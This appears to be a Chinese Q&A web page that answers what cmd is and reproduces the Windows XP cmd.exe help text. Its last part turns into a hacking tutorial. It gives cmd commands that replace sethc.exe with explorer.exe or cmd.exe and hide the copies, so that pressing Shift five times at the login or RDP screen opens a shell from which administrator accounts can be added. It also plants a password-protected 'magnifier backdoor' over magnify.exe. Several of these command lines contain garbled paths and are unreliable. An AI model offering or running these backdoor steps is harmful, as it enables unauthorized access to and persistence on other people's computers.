cmd的作用是什么啊

cmd是command的缩写.命令行

在9x系统下输入command就可以打开命令行.而在NT系统上可以输入cmd来打开.

在命令行里你可以看到你的系统版本,文件系统版本等等

你可以敲入help查看帮助

Cmd启动命令解释器 Cmd.exe 的新实例。如果在不含参数的情况下使用，则 cmd 显示 Windows XP 的版本和版权信息。

语法

cmd [[{/c|/k}] [/s] [/q] [/d] [{/a|/u}] [/t:fg] [/e:{on|off}] [/f:{on|off}] [/v:{on|off}] string]

参数

/c

执行 string 指定的命令，然后停止。

/k

执行 string 指定的命令并继续。

/s

修改位于 /c 或 /k 之后的 string 处理。

/q

关闭回显。

/d

禁用自动运行命令执行。

/a

创建美国国家标准协会 (ANSI) 输出。

/u

创建 Unicode 输出。

/t:fg

设置前景 f 和背景 g 的颜色。下表列出了可用作 f 和 g 的值的有效十六进制数字。 值 颜色

0 黑色

1 蓝色

2 绿

3 湖蓝色

4 红

5 紫色

6 黄

7 白色

8 灰色

9 浅蓝色

A 浅绿色

B 浅水绿

C 浅红色

D 浅紫色

E 浅黄色

F 亮白色

/e:on

启用命令扩展。

/e:off

禁用命令扩展。

/f:on

启用文件和目录名完成。

/f:off

禁用文件和目录名完成。

/v:on

启用延迟的环境变量扩展。

/v:off

禁用延迟的环境变量扩展。

string

指定要执行的命令。

/?

在命令提示符显示帮助。

注释

使用多个命令

可以在 string 中使用由 &&分隔的多个命令，不过这些命令必须置于引号之中（例如，"command&&command&&command"）。

处理引号

如果指定了 /c 或 /k，则在满足下述所有条件的情况下，cmd 会处理 string 中的其余命令而将引号保留：

未使用 /s。

正确使用一对引号。

在引号内未使用任何特殊字符（例如： &<>( ) @ ^ |}。

在引号内使用了一个或多个空格子符。

引号内的 string 为可执行文件的名称。

如果上述条件不能满足，则处理 string 时将首先检查它的第一个字符以验证其是否为左引号。如果第一个字符是左引号，则它会与右引号分离开。跟在右引号之后的任何文本都会得到保留。

执行注册表子项

如果在 string 中未指定 /d，Cmd.exe 会查找下述注册表子项：

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun\REG_SZ

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun REG_EXPAND_SZ

如果上述的一个注册表子项或两个都存在，则会在执行其他变量之前执行它们。

警告

编辑注册表不当可能会严重损坏您的系统。在更改注册表之前，应备份计算机上任何有价值的数据。

启用和禁用命令扩展

在 Windows XP 中，命令扩展在默认情况下是启用的。对于特定过程可以使用 /e:off 将它们禁用。通过设置下述 REG_DWORD 值，可以在计算机上或用户会话中启用或禁用所有 cmd 命令行选项的扩展：

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions\REG_DWORD

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions\REG_DWORD

在注册表中使用 Regedit.exe 可以将 REG_DWORD 值设为 0×1（即启用）或 0×0（即禁用）。用户特定设置优先于计算机设置，并且命令行选项优先于注册表设置。

警告

编辑注册表不当可能会严重损坏您的系统。在更改注册表之前，应备份计算机上任何有价值的数据。

启用命令扩展后，会影响到下述命令：

assoc

call

chdir (cd)

color

del (erase)

endlocal

for

ftype

goto

if

mkdir (md)

popd

prompt

pushd

set

setlocal

shift

start（还包括将更改外部命令过程）

有关这些命令的详细信息，请参阅“相关主题”。

启用延迟的环境变量扩展

启用延迟的环境变量扩展，可以使用感叹号字符来替代运行时的环境变量值。

启用文件和目录名完成

默认情况下，禁用文件和目录名完成。对于特定的 cmd 命令处理，可以通过 /f:{on|off} 来启用或禁用该功能。通过设置下述 REG_DWORD 值，可以在计算机上或用户会话中启用或禁用所有 cmd 命令处理的文件和目录名完成：

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar\REG_DWORD

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar\REG_DWORD

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar\REG_DWORD

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar\REG_DWORD

要设置 REG_DWORD 值，请运行 Regedit.exe 并使用特定功能的控制字符的十六进制值（例如，用 0×9 表示 TAB 键，用 0×08 表示 BACKSPACE 键）。用户特定设置优先于计算机设置，并且命令行选项优先于注册表设置。

警告

编辑注册表不当可能会严重损坏您的系统。在更改注册表之前，应备份计算机上任何有价值的数据。

如果使用 /f:on 启用了文件和目录名完成，则对于目录名完成，可使用 CTRL+D 组合键；而对于文件名完成，可使用 CTRL+F 组合键。要禁用注册表中特定字符的完成，请使用空格值 [0×20]，因为空格不是有效的控制字符。

按 CTRL+D 或 CTRL+F 组合键时，cmd 会处理文件和目录名的完成 *** 作。这些组合键的作用是在 string 后附加通配符（如果还未使用），并创建匹配的路径列表，然后显示第一个匹配的路径。如果所有路径都不匹配，文件和目录名完成 *** 作会发出警告声，并且不更改所显示的内容。要逐个查看匹配路径列表中的路径，请重复按 CTRL+D 或 CTRL+F 组合键。要向后查看该列表，请在按 SHIFT 的同时按 CTRL+D 或 CTRL+F 组合键。要放弃已保存的匹配路径列表并生成新列表，可以编辑 string，然后按 CTRL+D 或 CTRL+F 组合键。如果在 CTRL+D 和 CTRL+F 组合键之间切换，将会放弃已保存的匹配路径列表并生成新列表。CTRL+D 组合键与 CTRL+F 组合键之间唯一的不同在于，CTRL+D 仅匹配目录名，而 CTRL+F 既匹配文件名，又匹配目录名。如果在任何内部目录命令（CD、MD 或 RD）中使用文件和目录名的完成，将仅使用目录的完成。

如果将匹配路径置于引号之中，则文件和目录名完成会正确地处理含有空格或特殊字符的文件名。

下述特殊字符需要有引号：&<>[ ] { } ^ = ! ' + , ` ~ [white space]

如果您提供的信息包含空格，请将文本置于引号之中（例如，"Computer Name"）。

如果从 string 中处理文件和目录名完成 *** 作，则位于光标右侧的 [Path] 的任意部分都将放弃（即在 string 中处理完成 *** 作的位置）。

格式化图例

格式 含义

斜体 用户必须提供的信息

粗体 用户必须像显示的一样准确键入的元素

省略号 (...) 可在命令行中重复多次的参数

在括号 ([]) 之间 可选项目

在大括号 ({}) 之间；将选项用竖线 (|) 隔开。例如：{even|odd} 用户必须从中只选择一个选项的选项组

Courier 字体 代码或程序输出

cmd

是

command

的简写，是以前DOS版本中的一个命令

现在在Windows系统中一般不会用到

它可以在Windows系统中给 *** 作员在DOS窗口下对计算机进行一些文本式的 *** 作

或用于测试，调试计算机用

点击“开始”菜单－“运行”，输入命令“cmd”。回车后打开命令提示符窗口。在命令提示符窗口中，执行如下命令：

copy

c：＼wmdows＼explorer.exe

c：＼windows＼system32＼sethc.exe

copy

c：＼wmdows＼system32＼sethc.exe

c：＼windows＼system32＼ducache＼sethc.exe

attrib

c：＼windows＼system32＼sethc.exe+h

atmb

c：＼wmdows＼svstem32＼ducache＼sethc.exe+h

这几句命令的作用，是将系统中的辅助工具“sethc.exe”。替换成为“explerer.exe”，这样就可以在3389或本地登录界面中打开粘滞键开关了。以后在3389远程连接窗口中，连续按下5次shift键。即可自动打开资源管理器。点击工具栏“向上”按钮。返回到桌面，右键点击“我的电脑”。在d出菜单中选择“管理”命令，打开管理工具，直接添加用户名即可。也可以打开控制面板中的用户帐户，添加管理员帐户。用同样的原理，也可将“sethc.exe”。替换成为“cmd.exe”，即可在cmdshell中执行帐户添加命令。

小提示

在windows

2000/xp/vista下，连续按shift键5次，可以运行“sethc，exe”打开粘滞键，而且在登录界面里也可以打开。采用替换“sethc.exe”的文件的方法，就可以实现运行任意程序的目的。其原理类似于将windows系统的屏保程序替换成“cmd.exe”。就可以打开shell了。

留个放大镜后门

上面利用的是粘滞键辅助工具。其实系统中还有其它的辅助工具。比如“放大镜”——按下win+u组合键，即可打开放大镜辅助工具。可以用与上面相同的方法来创建一个后门。不过这里我们利用工具来完成 *** 作，并且还要为后门加上一个密码。

运行“放大镜后门生成器”，在“后门启动密码”中输入要设置的后门密码。然后点击“生成”按钮，指定生成文件名路径为“c：＼ivy.exe”。然后点击“开始”菜单－“运行”。输入命令“cmd”。回车后打开命令提示符窗口。在命令窗口中执行如下命令：

copy

%systemroot%\system32\magnify.exe

%systemroot%\system32\nagnify.exe

copy

c

\ivy

exe

%systemroot%\system32\magmfy.exe

copy

c:\ivy.exe

%systemroot%\system32\dllcache\magnify.exe

执行命令成功后，后门就创建成功了。以后在本地或3389远程登录界面中。按下win+u组合键，打开辅助工具对话框，选择“放大镜”，点击“启动”按钮，要求输入设定的后门启动密码。确定后。打开后门程序，可执行“cmd.exe”和程序自己添加自定义用户。直接输入要添加的用户名和密码。点击“添加”按钮即可。要执行cmd命令的话，可点击“执行cmd命令”按钮，即可打开cmd命令提示符窗口。

---